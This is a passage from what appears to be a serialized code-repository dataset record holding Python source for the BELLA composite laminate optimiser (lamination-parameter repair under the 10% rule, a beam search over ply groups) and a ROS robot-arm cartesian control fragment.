\"/lwr_arm_1_link\"\n redundancy_marker.name = \"red_marker\"\n rotate_control = InteractiveMarkerControl()\n rotate_control.name = \"rotate_z\"\n rotate_control.orientation.w = 1\n rotate_control.orientation.y = 1\n rotate_control.interaction_mode = InteractiveMarkerControl.ROTATE_AXIS\n redundancy_marker.controls.append(rotate_control)\n redundancy_marker.scale = 0.25\n self.server.insert(redundancy_marker, self.redundancy_marker_feedback)\n\n # 'commit' changes and send to all clients\n self.server.applyChanges()\n\n def update_marker(self, T):\n if sixdof:\n self.server.setPose(\"cc_marker\", convert_to_message(T))\n else:\n Ttrans = tf.transformations.translation_matrix(\n tf.transformations.translation_from_matrix(T)\n )\n self.server.setPose(\"cc_marker\", convert_to_message(Ttrans))\n self.server.applyChanges()\n\n def redundancy_marker_feedback(self, feedback): \n if feedback.event_type == feedback.MOUSE_DOWN:\n self.red_tracking = 1\n elif feedback.event_type == feedback.MOUSE_UP:\n self.q0_desired = self.q_current[0]\n self.red_tracking = 0\n if feedback.event_type == feedback.POSE_UPDATE:\n q = feedback.pose.orientation\n qvec = ((q.x, q.y, q.z, q.w))\n R = tf.transformations.quaternion_matrix(qvec)\n angle, direction, point = tf.transformations.rotation_from_matrix(R)\n self.mutex.acquire()\n if abs(self.q0_desired - angle) < 1.0: self.q0_desired = angle\n self.mutex.release()\n\n def control_marker_feedback(self, feedback):\n if feedback.event_type == feedback.MOUSE_DOWN:\n self.ee_tracking = 1\n elif feedback.event_type == feedback.MOUSE_UP:\n self.ee_tracking = 0\n self.x_target = self.x_current\n elif feedback.event_type == feedback.POSE_UPDATE:\n self.mutex.acquire()\n R = tf.transformations.quaternion_matrix((feedback.pose.orientation.x,\n feedback.pose.orientation.y,\n feedback.pose.orientation.z,\n feedback.pose.orientation.w))\n T = tf.transformations.translation_matrix((feedback.pose.position.x, \n feedback.pose.position.y, \n feedback.pose.position.z))\n self.x_target = numpy.dot(T,R)\n self.mutex.release()\n\n def timer_callback(self, event):\n msg = JointState()\n if self.ee_tracking or self.red_tracking:\n self.mutex.acquire()\n dq = cartesian_control(self.joint_transforms, \n self.q_current, self.q0_desired,\n self.x_current, self.x_target)\n self.mutex.release()\n msg.velocity = dq\n else: \n msg.velocity = numpy.zeros(7)\n self.pub_vel.publish(msg)\n \n def callback(self, joint_values):\n root = self.robot.get_root()\n T = tf.transformations.identity_matrix()\n self.mutex.acquire()\n self.joint_transforms = []\n self.q_current = joint_values.position\n self.process_link_recursive(root, T, joint_values)\n if not self.ee_tracking:\n self.update_marker(self.x_current)\n self.mutex.release()\n\n def align_with_z(self, axis):\n T = tf.transformations.identity_matrix()\n z = numpy.array([0,0,1])\n x = numpy.array([1,0,0])\n dot = numpy.dot(z,axis)\n if dot == 1: return T\n if dot == -1: return tf.transformation.rotation_matrix(math.pi, x)\n rot_axis = numpy.cross(z, axis)\n angle = math.acos(dot)\n return tf.transformations.rotation_matrix(angle, rot_axis)\n\n def process_link_recursive(self, link, T, joint_values):\n if link not in self.robot.child_map: \n self.x_current = T\n return\n for i in range(0,len(self.robot.child_map[link])):\n (joint_name, next_link) = self.robot.child_map[link][i]\n if joint_name not in self.robot.joint_map:\n rospy.logerror(\"Joint not found in map\")\n continue\n current_joint = self.robot.joint_map[joint_name] \n\n trans_matrix = tf.transformations.translation_matrix((current_joint.origin.xyz[0], \n current_joint.origin.xyz[1],\n current_joint.origin.xyz[2]))\n rot_matrix = tf.transformations.euler_matrix(current_joint.origin.rpy[0], \n current_joint.origin.rpy[1],\n current_joint.origin.rpy[2], 'rxyz')\n origin_T = numpy.dot(trans_matrix, rot_matrix)\n current_joint_T = numpy.dot(T, origin_T)\n if current_joint.type != 'fixed':\n if current_joint.name not in joint_values.name:\n rospy.logerror(\"Joint not found in list\")\n continue\n # compute transform that aligns rotation axis with z\n aligned_joint_T = numpy.dot(current_joint_T, self.align_with_z(current_joint.axis))\n self.joint_transforms.append(aligned_joint_T)\n index = joint_values.name.index(current_joint.name)\n angle = joint_values.position[index]\n joint_rot_T = tf.transformations.rotation_matrix(angle, \n numpy.asarray(current_joint.axis))\n next_link_T = numpy.dot(current_joint_T, joint_rot_T) \n else:\n next_link_T = current_joint_T\n\n self.process_link_recursive(next_link, next_link_T, joint_values)\n \n\nif __name__ == '__main__':\n rospy.init_node('cartesian_control', anonymous=True)\n cc = CartesianControl()\n rospy.spin()\n"
}
] | 2 |
noemiefedon/BELLA
|
https://github.com/noemiefedon/BELLA
|
2c23daaa8dac9b5340b9f983561bd1bb3625c128
|
ca86e5cd6f593478235c64aa4d0409b0e78dbcbb
|
0e286f754e7ce032aa80477c8c3a5f6262fce38b
|
refs/heads/main
| 2023-04-01T11:41:15.125542 | 2021-03-24T12:00:54 | 2021-03-24T12:00:54 | 343,455,890 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5537744164466858,
"alphanum_fraction": 0.5833090543746948,
"avg_line_length": 37.895347595214844,
"blob_id": "a0f986be43ecb50ab5fbce043f3ca4dcec4d7dcc",
"content_id": "9f077802014bf68a89b7e9b7b772973129944ab1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10293,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 258,
"path": "/src/RELAY/repair_membrane_1_ipo_Abdalla.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\n- calc_objA_options_1\r\n calculates the possible in-plane objective function values achievable by\r\n modifying the fibre orientations of couples of angled plies\r\n\r\n- repair_membrane_1_ipo:\r\n repair for membrane properties only accounting for one panel when the\r\n laminate must remain balanced\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport numpy as np\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.divers.sorting import sortAccording\r\nfrom src.RELAY.repair_10_bal import calc_ind_plies\r\nfrom src.RELAY.repair_10_bal import calc_lampamA_ply_queue\r\nfrom src.RELAY.repair_10_bal import calc_lampamA_options_1\r\nfrom src.RELAY.repair_membrane_1_ipo import calc_objA_options_1\r\nfrom src.guidelines.ten_percent_rule_Abdalla import calc_distance_Abdalla\r\n\r\ndef repair_membrane_1_ipo_Abdalla(\r\n ss_ini, ply_queue_ini, in_plane_coeffs,\r\n p_A, lampam_target, constraints):\r\n \"\"\"\r\n modifies a stacking sequence to better converge towards the in-plane target\r\n lamination parameters. The modifications preserves the satisfaction to the\r\n 10% rule formulated by Abdalla, to the balance requirements and to the\r\n damage tolerance constraints.\r\n\r\n First the fibre orientations of couples of angled plies situated in the\r\n middle of the laminate are modified to ensure convergence for the\r\n in-plane lamination parameters.\r\n Then the fibre orientations of 0 and 90 deg plies may be modified to the\r\n other orientation.\r\n\r\n INPUTS\r\n\r\n - ss_ini: partially retrieved stacking sequence\r\n - ply_queue_ini: queue of plies for innermost plies\r\n - in_plane_coeffs: coefficients in the in-plane objective function\r\n - p_A: coefficient for the proportion of the laminate thickness that can be\r\n modified during the repair for membrane properties\r\n - lampam_target: lamination parameter targets\r\n - constraints: design and manufacturing constraints\r\n - in_plane_coeffs: coefficients in the in-plane objective function\r\n \"\"\"\r\n\r\n n_plies = ss_ini.size\r\n\r\n ss = np.copy(ss_ini)\r\n ply_queue = ply_queue_ini[:]\r\n\r\n\r\n lampamA = calc_lampamA_ply_queue(ss, n_plies, ply_queue, constraints)\r\n objA = sum(in_plane_coeffs * ((lampamA - lampam_target[0:4]) ** 2))\r\n# print()\r\n# print('lampamA', lampamA)\r\n# print('objA', objA)\r\n\r\n ss_list = [np.copy(ss)]\r\n ply_queue_list = [ply_queue[:]]\r\n lampamA_list = [lampamA]\r\n objA_list = [objA]\r\n\r\n indices_1, indices_per_angle = calc_ind_plies(\r\n ss, n_plies, ply_queue, constraints, p_A)\r\n indices_to_sort = list(indices_1)\r\n indices_to_sort.insert(0, -1)\r\n# print('indices_1', list(indices_1))\r\n# print('indices_per_angle', list(indices_per_angle))\r\n# print('indices_to_sort', indices_to_sort)\r\n\r\n lampamA_options = calc_lampamA_options_1(n_plies, constraints)\r\n objA_options = calc_objA_options_1(\r\n lampamA, lampamA_options, lampam_target, constraints, in_plane_coeffs)\r\n\r\n while np.min(objA_options) + 1e-20 < objA and objA > 1e-10:\r\n# print('objA', objA)\r\n# print('objA_options', objA_options)\r\n\r\n # attempts at modifying a couple of angled plies\r\n ind_pos_angle1, ind_pos_angle2 = np.unravel_index(\r\n np.argmin(objA_options, axis=None), objA_options.shape)\r\n angle1 = constraints.pos_angles[ind_pos_angle1]\r\n angle2 = constraints.pos_angles[ind_pos_angle2]\r\n# print('angle1', angle1, 'angle2', angle2)\r\n ind_angle1 = constraints.ind_angles_dict[angle1]\r\n ind_angle1_minus = constraints.ind_angles_dict[-angle1]\r\n ind_angle2 = constraints.ind_angles_dict[angle2]\r\n ind_angle2_minus = constraints.ind_angles_dict[-angle2]\r\n# print('ind_angle1', ind_angle1, 'ind_angle2', ind_angle2)\r\n\r\n# print('indices_per_angle', indices_per_angle)\r\n\r\n # if plies +-theta exist in the middle of the laminate\r\n if angle1 in [0, 90]:\r\n # if no couple of plies to be deleted\r\n if len(indices_per_angle[ind_angle1]) < 2:\r\n objA_options[ind_pos_angle1, ind_pos_angle2] = 1e10\r\n continue\r\n else:\r\n # if no couple of plies to be deleted\r\n if len(indices_per_angle[ind_angle1]) < 1 \\\r\n or len(indices_per_angle[ind_angle1_minus]) < 1:\r\n objA_options[ind_pos_angle1, ind_pos_angle2] = 1e10\r\n continue\r\n\r\n # attention to not break the 10% rule\r\n LPs = lampamA + lampamA_options[ind_pos_angle2] - lampamA_options[\r\n ind_pos_angle1]\r\n if calc_distance_Abdalla(LPs, constraints) > 1e-10:\r\n objA_options[ind_angle1, ind_angle2] = 1e10\r\n continue\r\n\r\n# print('objA_options after clean', objA_options)\r\n# print('+-', angle1, ' plies changed into +-', angle2, 'plies')\r\n# print('ind_angle1', ind_angle1, 'ind_angle2', ind_angle2)\r\n# print('indices_per_angle[ind_angle1]', indices_per_angle[ind_angle1])\r\n# print('indices_per_angle[ind_angle2]', indices_per_angle[ind_angle2])\r\n\r\n lampamA = LPs\r\n objA = objA_options[ind_pos_angle1, ind_pos_angle2]\r\n# print()\r\n# print('lampamA', lampamA)\r\n# print('objA', objA)\r\n\r\n # modification of the stacking sequence\r\n ind_ply_1 = indices_per_angle[ind_angle1].pop(0)\r\n ind_ply_2 = indices_per_angle[ind_angle1_minus].pop(0)\r\n# print('ind_ply_1', ind_ply_1)\r\n# print('ind_ply_2', ind_ply_2)\r\n# print('ply_queue', ply_queue)\r\n\r\n if ind_ply_1 == 6666: # ply from the queue\r\n ply_queue.remove(angle1)\r\n ply_queue.append(angle2)\r\n else:\r\n ss[ind_ply_1] = angle2\r\n if constraints.sym:\r\n ss[ss.size - ind_ply_1 - 1] = ss[ind_ply_1]\r\n\r\n if ind_ply_2 == 6666: # ply from the queue\r\n if angle1 == 90:\r\n ply_queue.remove(90)\r\n else:\r\n ply_queue.remove(-angle1)\r\n\r\n if angle2 == 90:\r\n ply_queue.append(90)\r\n else:\r\n ply_queue.append(-angle2)\r\n else:\r\n if angle2 != 90:\r\n ss[ind_ply_2] = -angle2\r\n else:\r\n ss[ind_ply_2] = 90\r\n if constraints.sym:\r\n ss[ss.size - ind_ply_2 - 1] = ss[ind_ply_2]\r\n\r\n# lampamA_check = calc_lampamA_ply_queue(\r\n# ss, ss.size, ply_queue, constraints)\r\n\r\n ss_list.insert(0, np.copy(ss))\r\n ply_queue_list.insert(0, ply_queue[:])\r\n lampamA_list.insert(0, np.copy(lampamA))\r\n objA_list.insert(0, objA)\r\n\r\n indices_per_angle[ind_angle2].append(ind_ply_1)\r\n indices_per_angle[ind_angle2_minus].append(ind_ply_2)\r\n if constraints.sym:\r\n indices_per_angle[ind_angle2].sort(reverse=True)\r\n indices_per_angle[ind_angle2_minus].sort(reverse=True)\r\n else:\r\n sortAccording(indices_per_angle[ind_angle2], indices_to_sort)\r\n sortAccording(indices_per_angle[ind_angle2_minus], indices_to_sort)\r\n indices_per_angle[ind_angle2].reverse()\r\n indices_per_angle[ind_angle2_minus].reverse()\r\n\r\n# print('indices_per_angle', indices_per_angle)\r\n# print('objA', objA)\r\n if objA < 1e-10:\r\n break\r\n\r\n objA_options = calc_objA_options_1(\r\n lampamA, lampamA_options, lampam_target, constraints,\r\n in_plane_coeffs)\r\n\r\n# print('objA', objA)\r\n\r\n # attempt at changing a 0 deg ply into a 90 deg ply\r\n ind_0 = np.where(constraints.pos_angles == 0)[0][0]\r\n ind_90 = np.where(constraints.pos_angles == 90)[0][0]\r\n\r\n if indices_per_angle[constraints.ind_angles_dict[0]]:\r\n\r\n LPs = lampamA + (lampamA_options[ind_90] - lampamA_options[ind_0])/2\r\n obj_0_to_90 = sum(in_plane_coeffs*((LPs - lampam_target[0:4])**2))\r\n\r\n# print('obj_0_to_90', obj_0_to_90)\r\n\r\n if obj_0_to_90 + 1e-20 < objA \\\r\n and calc_distance_Abdalla(LPs, constraints) == 0:\r\n# print('excess_10[0]', excess_10[0])\r\n# print('0 deg ply changed to 90 deg ply')\r\n objA = obj_0_to_90\r\n lampamA += (lampamA_options[ind_90] - lampamA_options[ind_0])/2\r\n ind_ply_1 = indices_per_angle[constraints.index0].pop(0)\r\n if ind_ply_1 == 6666: # ply from the queue\r\n ply_queue.remove(0)\r\n ply_queue.append(90)\r\n else:\r\n ss[ind_ply_1] = 90\r\n if constraints.sym:\r\n ss[ss.size - ind_ply_1 - 1] = ss[ind_ply_1]\r\n\r\n ss_list.insert(0, np.copy(ss))\r\n ply_queue_list.insert(0, ply_queue[:])\r\n lampamA_list.insert(0, np.copy(lampamA))\r\n objA_list.insert(0, objA)\r\n# print()\r\n# print('lampamA', lampamA)\r\n# print('objA', objA)\r\n\r\n return ss_list, ply_queue_list, lampamA_list, objA_list\r\n\r\n # attempt at changing a 90 deg ply into a 0 deg ply\r\n if indices_per_angle[constraints.ind_angles_dict[90]]:\r\n LPs = lampamA + (lampamA_options[ind_0] - lampamA_options[ind_90])/2\r\n obj_90_to_0 = sum(in_plane_coeffs * ((LPs - lampam_target[0:4])**2))\r\n# print('obj_90_to_0', obj_90_to_0)\r\n\r\n if obj_90_to_0 + 1e-20 < objA\\\r\n and calc_distance_Abdalla(LPs, constraints) == 0:\r\n# print('90 deg ply changed to 0 deg ply')\r\n objA = obj_90_to_0\r\n lampamA += (lampamA_options[ind_0] - lampamA_options[ind_90])/2\r\n ind_ply_1 = indices_per_angle[constraints.index90].pop(0)\r\n if ind_ply_1 == 6666: # ply from the queue\r\n ply_queue.remove(90)\r\n ply_queue.append(0)\r\n else:\r\n ss[ind_ply_1] = 0\r\n if constraints.sym:\r\n ss[ss.size - ind_ply_1 - 1] = ss[ind_ply_1]\r\n\r\n ss_list.insert(0, np.copy(ss))\r\n ply_queue_list.insert(0, ply_queue[:])\r\n lampamA_list.insert(0, np.copy(lampamA))\r\n objA_list.insert(0, objA)\r\n# print()\r\n# print('lampamA', lampamA)\r\n# print('objA', objA)\r\n\r\n return ss_list, ply_queue_list, lampamA_list, objA_list\r\n"
},
{
"alpha_fraction": 0.5046149492263794,
"alphanum_fraction": 0.5177241563796997,
"avg_line_length": 41.974510192871094,
"blob_id": "2acd5f3012e261f4fcbec139fb9fc19c7a697079",
"content_id": "36267fc5314cf71a5fc850fc75f5076e9e040a7f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 22427,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 510,
"path": "/src/LAYLA_V02/beam_search.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# - * - coding: utf - 8 - * -\r\n\"\"\"\r\nBeam search for a ply group search\r\n\"\"\"\r\n__version__ = '2.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport math as ma\r\nimport numpy as np\r\n\r\nsys.path.append(r'C:\\BELLA_and_LAYLA')\r\nfrom src.divers.pretty_print import print_lampam, print_ss, print_list_ss\r\nfrom src.guidelines.ten_percent_rule import calc_penalty_10_pc\r\nfrom src.guidelines.balance import calc_penalty_bal\r\nfrom src.guidelines.ipo_oopo import calc_penalty_ipo_oopo_ss\r\nfrom src.guidelines.one_stack import check_lay_up_rules\r\nfrom src.CLA.lampam_functions import calc_lampam_from_delta_lp_matrix\r\nfrom src.LAYLA_V02.objectives import calc_obj_multi_ss, objectives\r\nfrom src.LAYLA_V02.pruning import pruning_diso_contig_damtol\r\nfrom src.RELAY.repair_ss import repair_ss\r\nfrom src.divers.arrays import max_arrays\r\n\r\n# do you want to save the success rate of the repair strategy?\r\nSAVE_SUCCESS_RATE = True\r\n\r\ndef beam_search(\r\n levels,\r\n lampam_current,\r\n lampam_weightings,\r\n group_size,\r\n targets,\r\n parameters,\r\n constraints,\r\n n_plies_per_angle,\r\n cummul_mom_areas,\r\n delta_lampams,\r\n last_group=False,\r\n mat_prop=None,\r\n not_constraints=None,\r\n random_for_10=0,\r\n middle_ply=0,\r\n ss_top=None,\r\n ss_bot=None):\r\n '''\r\n beam search for a ply group search\r\n\r\n INPUTS\r\n\r\n - levels: ply indices\r\n - n_plies_in_groups: number of plies in each group of plies\r\n - lampam_current: lamination parameters of all plies in the laminate but\r\n not the plies in the group under optimisation\r\n - n_plies_per_angle: ply counts in each fibre direction of all plies in the\r\n laminate but not the plies in the group under optimisation\r\n - lampam_weightings: lamination parameter weightings at each search level\r\n - group_size: size of the ply group under determination\r\n - parameters: parameters of the optimiser\r\n - constraints: lay-up design guidelines\r\n - targets: target lamination parameters and ply counts\r\n - mat_prop: material properties\r\n - cummul_mom_areas: cummulated ply moments of areas\r\n - last_group: flag indicating of the last ply group is to be optimised\r\n - not_constraints: design guidelines that should not be satisfied\r\n - random_for_10: number to decide a ply orientation in which the 10% rule\r\n must not be satisfied\r\n - delta_lampams: ply partial lamination parameters\r\n - middle_ply: middle ply position of symmetric laminates, 0 otherwise\r\n - ss_top_ini: lay-up of plies at the top of the laminate\r\n - ss_bot_ini:lay-up of plies at the bottom of the laminate\r\n '''\r\n results = beamsearchResults()\r\n\r\n # details for when the 10% rule should be violated\r\n if not_constraints is not None and not_constraints.rule_10_percent:\r\n n_plies_0_lim = ma.ceil(not_constraints.percent_0 * targets.n_plies)\r\n n_plies_90_lim = ma.ceil(\r\n not_constraints.percent_90 * targets.n_plies)\r\n n_plies_45_lim = ma.ceil(\r\n not_constraints.percent_45 * targets.n_plies)\r\n n_plies_135_lim = ma.ceil(\r\n not_constraints.percent_135 * targets.n_plies)\r\n n_plies_45_135_lim = ma.ceil(\r\n not_constraints.percent_45_135 * targets.n_plies)\r\n if constraints.sym:\r\n n_plies_0_lim = ma.ceil(n_plies_0_lim / 2)\r\n n_plies_90_lim = ma.ceil(n_plies_90_lim / 2)\r\n n_plies_45_lim = ma.ceil(n_plies_45_lim / 2)\r\n n_plies_135_lim = ma.ceil(n_plies_135_lim / 2)\r\n n_plies_45_135_lim = ma.ceil(n_plies_45_135_lim / 2)\r\n\r\n # simplifies ss_top and ss_bot for faster feasibility checks?\r\n ss_bot_simp = np.copy(ss_bot)\r\n if not constraints.sym:\r\n ss_top_simp = np.copy(ss_top)\r\n\r\n if constraints.contig or constraints.diso:\r\n if ss_bot.size > constraints.n_contig:\r\n ss_bot_simp = ss_bot[-constraints.n_contig:]\r\n\r\n if not constraints.sym:\r\n if ss_top.size > constraints.n_contig:\r\n ss_top_simp = ss_top[:constraints.n_contig]\r\n\r\n # nodal stacking sequences\r\n ss_bot_tab = [np.array((), dtype='int16')]\r\n if not constraints.sym:\r\n ss_top_tab = [np.array((), dtype='int16')]\r\n # nodal lamination parameters\r\n lampam_tab = lampam_current.reshape((1, 12))\r\n # estimate functions\r\n obj_const_tab = np.zeros((1,), float)\r\n # nodal ply counts in each fibre orientations\r\n ply_counts_tab = n_plies_per_angle.reshape((1, constraints.n_set_of_angles))\r\n\r\n if last_group:\r\n ss_final = np.array((), dtype='int16').reshape((0, targets.n_plies))\r\n\r\n for local_level in range(group_size):\r\n\r\n level = levels[local_level]\r\n# print('********************************')\r\n# print('level', level)\r\n\r\n for el in range(obj_const_tab.size):\r\n\r\n try:\r\n mother_lampam = lampam_tab[0]\r\n except IndexError:\r\n raise Exception(\r\n 'Infeasible beam-search, increase the branching limits')\r\n\r\n mother_ss_bot = ss_bot_tab.pop(0)\r\n if not constraints.sym:\r\n mother_ss_top = ss_top_tab.pop(0)\r\n mother_ply_counts = ply_counts_tab[0]\r\n\r\n\r\n # deletion of the mother lamination parameters/ply counts/estimate\r\n # function values from the queues\r\n lampam_tab = np.delete(lampam_tab, np.s_[0], axis=0)\r\n ply_counts_tab = np.delete(ply_counts_tab, np.s_[0], axis=0)\r\n obj_const_tab = np.delete(obj_const_tab, np.s_[0])\r\n\r\n # branching\r\n child_ss = np.copy(constraints.set_of_angles)\r\n\r\n # pruning\r\n if constraints.sym:\r\n child_ss = pruning_diso_contig_damtol(\r\n child_ss=child_ss,\r\n mother_ss_bot=mother_ss_bot,\r\n ss_bot_simp=ss_bot_simp,\r\n level=level,\r\n constraints=constraints,\r\n targets=targets)\r\n else:\r\n child_ss = pruning_diso_contig_damtol(\r\n child_ss=child_ss,\r\n mother_ss_bot=mother_ss_bot,\r\n mother_ss_top=mother_ss_top,\r\n ss_bot_simp=ss_bot_simp,\r\n ss_top_simp=ss_top_simp,\r\n level=level,\r\n constraints=constraints,\r\n targets=targets)\r\n\r\n# print(child_ss)\r\n\r\n if child_ss is None:\r\n continue\r\n\r\n# print('mother_ss', mother_ss)\r\n# print('child_ss after pruning diso/contig/damtol', child_ss.T)\r\n\r\n # caluclate the lamination parameters\r\n child_lampam = np.matlib.repmat(mother_lampam, child_ss.size, 1)\r\n for myindex in range(child_ss.size):\r\n child_lampam[myindex] += delta_lampams[\r\n level, constraints.ind_angles_dict[child_ss[myindex]]]\r\n\r\n # calculate the ply counts\r\n # & compute the stacking sequences\r\n # & calculate the penalties for the 10% rule\r\n penalty_10 = np.array((), float)\r\n n_solution = 0\r\n for indd in range(child_ss.size)[::-1]:\r\n\r\n ply_counts = np.copy(mother_ply_counts)\r\n index = constraints.ind_angles_dict[child_ss[indd]]\r\n if middle_ply != 0 and local_level == group_size - 1:\r\n ply_counts[index] += 1/2\r\n else:\r\n ply_counts[index] += 1\r\n\r\n # pruning for not_constraints\r\n if not_constraints is not None \\\r\n and not_constraints.rule_10_percent:\r\n if random_for_10 == 0 \\\r\n and ply_counts[constraints.index0] + 1 >= n_plies_0_lim:\r\n continue\r\n if random_for_10 == 1\\\r\n and ply_counts[constraints.index90] + 1 >= n_plies_90_lim:\r\n continue\r\n if random_for_10 == 2 \\\r\n and ply_counts[constraints.index45] + 1 >= n_plies_45_lim:\r\n continue\r\n if random_for_10 == 3 \\\r\n and ply_counts[constraints.index135] + 1 >= n_plies_135_lim:\r\n continue\r\n if random_for_10 == 4 \\\r\n and ply_counts[constraints.index45] + \\\r\n ply_counts[constraints.index135] + 1 >= n_plies_45_135_lim:\r\n continue\r\n\r\n # penalty for the 10% rule\r\n if local_level == group_size - 1 \\\r\n and constraints.rule_10_percent \\\r\n and parameters.penalty_10_pc_switch:\r\n penalty_10 = np.hstack((\r\n penalty_10,\r\n calc_penalty_10_pc(ply_counts, constraints)))\r\n\r\n n_solution += 1\r\n\r\n if constraints.sym:\r\n new_stack_bot = np.copy(mother_ss_bot)\r\n new_stack_bot = np.hstack((new_stack_bot, child_ss[indd]))\r\n ss_bot_tab.append(new_stack_bot)\r\n else:\r\n new_stack_bot = np.copy(mother_ss_bot)\r\n new_stack_top = np.copy(mother_ss_top)\r\n\r\n if local_level % 2:\r\n new_stack_top = np.hstack((\r\n child_ss[indd], new_stack_top))\r\n else:\r\n new_stack_bot = np.hstack((\r\n new_stack_bot, child_ss[indd]))\r\n ss_bot_tab.append(new_stack_bot)\r\n ss_top_tab.append(new_stack_top)\r\n\r\n# print('new_stack_bot', new_stack_bot)\r\n# print('new_stack_top', new_stack_top)\r\n\r\n lampam_tab = np.vstack((lampam_tab, child_lampam[indd]))\r\n ply_counts_tab = np.vstack((ply_counts_tab, ply_counts))\r\n\r\n if penalty_10.size == 0:\r\n penalty_10 = 0\r\n\r\n results.n_nodes += n_solution\r\n if n_solution == 0:\r\n continue # go to next branching\r\n\r\n # estimate function values with no constraints\r\n# print('no - constraints')\r\n# for el in lampam_tab[lampam_tab.shape[0] - n_solution:]:\r\n# print('lampam', el[0:4])\r\n obj_no_constraints = objectives(\r\n lampam=lampam_tab[lampam_tab.shape[0] - n_solution:],\r\n targets=targets,\r\n lampam_weightings=lampam_weightings[level],\r\n constraints=constraints,\r\n parameters=parameters,\r\n mat_prop=mat_prop)\r\n\r\n if last_group and local_level == group_size - 1:\r\n\r\n # full stacking sequences\r\n for indd in range(n_solution)[::-1]:\r\n indddd = len(ss_bot_tab) - indd - 1\r\n# print('child_ss_tab[indddd]', child_ss_tab[indddd])\r\n\r\n if constraints.sym:\r\n ss = np.hstack((\r\n ss_bot,\r\n ss_bot_tab[indddd],\r\n np.flip(ss_bot_tab[indddd], axis=0),\r\n np.flip(ss_bot, axis=0))).astype('int16')\r\n if middle_ply != 0:\r\n ss = np.delete(ss, np.s_[middle_ply], axis=0)\r\n else:\r\n ss = np.hstack((\r\n ss_bot,\r\n ss_bot_tab[indddd],\r\n ss_top_tab[indddd],\r\n ss_top)).astype('int16')\r\n if ss.size != targets.n_plies:\r\n print('ss.size', ss.size)\r\n print('targets.n_plies', targets.n_plies)\r\n raise Exception(\"This should not happen\")\r\n\r\n # repair\r\n results.n_designs_last_level += 1\r\n# print('before repair')\r\n# print_ss(ss)\r\n# print('obj_no_constraints ', obj_no_constraints )\r\n ss, success_repair, n_obj_func_D_calls = repair_ss(\r\n ss, constraints, parameters, targets.lampam, True)\r\n# results.n_obj_func_calls += n_obj_func_D_calls\r\n# print('repair successful?', success_repair)\r\n# print('after repair')\r\n# print_ss(ss)\r\n# print('obj_no_constraints ', obj_no_constraints )\r\n if success_repair:\r\n results.n_designs_repaired += 1\r\n# print('no - constraints - after success full repair')\r\n obj_no_constraints[n_solution - indd - 1] = objectives(\r\n lampam=calc_lampam_from_delta_lp_matrix(\r\n ss, constraints, delta_lampams),\r\n targets=targets,\r\n lampam_weightings=lampam_weightings[level],\r\n constraints=constraints,\r\n parameters=parameters,\r\n mat_prop=mat_prop)\r\n# results.n_obj_func_calls += 1\r\n check_lay_up_rules(ss, constraints)\r\n lampam_tab[indddd] = calc_lampam_from_delta_lp_matrix(\r\n ss, constraints, delta_lampams)\r\n else:\r\n# print('unsuccess full repair')\r\n obj_no_constraints[n_solution - indd - 1] = 1e10\r\n ss_final = np.vstack((ss_final, ss))\r\n\r\n\r\n # calculation the penalties for the in-plane and out-of-plane\r\n # orthotropy requirements based on lamination parameters\r\n penalty_ipo_lampam, penalty_oopo = calc_penalty_ipo_oopo_ss(\r\n lampam_tab[lampam_tab.shape[0] - n_solution:],\r\n constraints=constraints,\r\n parameters=parameters,\r\n cummul_areas=cummul_mom_areas[level, 0],\r\n cummul_sec_mom_areas=cummul_mom_areas[level, 2])\r\n# print('penalty_ipo_lampam', penalty_ipo_lampam.shape)\r\n# print('penalty_oopo', penalty_oopo.shape)\r\n\r\n # calculation the penalties for the in-plane orthotropy\r\n # requirements based on ply counts\r\n penalty_ipo_pc = np.zeros((n_solution,))\r\n if constraints.ipo and parameters.penalty_bal_switch:\r\n penalty_ipo_pc = calc_penalty_bal(\r\n ply_counts,\r\n constraints=constraints,\r\n cummul_areas=cummul_mom_areas[level, 0])\r\n# print('penalty_ipo_pc', penalty_ipo_pc.shape)\r\n\r\n penalty_bal_ipo = max_arrays(penalty_ipo_pc, penalty_ipo_lampam)\r\n\r\n # calculation of the bounds\r\n obj_const = calc_obj_multi_ss(\r\n objective=obj_no_constraints,\r\n penalty_10=penalty_10,\r\n penalty_bal_ipo=penalty_bal_ipo,\r\n penalty_oopo=penalty_oopo,\r\n coeff_10=parameters.coeff_10,\r\n coeff_bal_ipo=parameters.coeff_bal_ipo,\r\n coeff_oopo=parameters.coeff_oopo)\r\n obj_const_tab = np.hstack((obj_const_tab, obj_const))\r\n\r\n# print('')\r\n# print('lampam_tab', lampam_tab.shape)\r\n# print('obj_const_tab', obj_const_tab.shape)\r\n# print('mother_ss', mother_ss)\r\n# print('mother_lampam', mother_lampam[0:4])\r\n# print('child_ss', child_ss.T)\r\n# print('lampam_tab', lampam_tab[-1][0:4])\r\n# print('lampam_tab', lampam_tab[-2][0:4])\r\n# print('lampam_tab', lampam_tab[-3][0:4])\r\n# print('obj_const', obj_const, '\\n\\n')\r\n\r\n # local pruning\r\n n_local_nodes = obj_const.size\r\n if last_group and local_level != group_size - 1:\r\n node_limit = parameters.local_node_limit_final\r\n else:\r\n node_limit = parameters.local_node_limit\r\n n_excess_nodes = n_local_nodes - node_limit\r\n if local_level != group_size - 1 and n_excess_nodes > 0:\r\n obj_const_tab_to_del = np.copy(obj_const)\r\n to_del = []\r\n for counter in range(n_excess_nodes):\r\n ind_max = np.argmax(obj_const_tab_to_del)\r\n obj_const_tab_to_del[ind_max] = -6666\r\n to_del.append(ind_max + obj_const_tab.size - n_local_nodes)\r\n ss_bot_tab = [elem for ind, elem in enumerate(ss_bot_tab) \\\r\n if ind not in to_del]\r\n if not constraints.sym:\r\n ss_top_tab = [elem for ind, elem in enumerate(ss_top_tab) \\\r\n if ind not in to_del]\r\n lampam_tab = np.delete(lampam_tab, np.s_[to_del], axis=0)\r\n ply_counts_tab = np.delete(\r\n 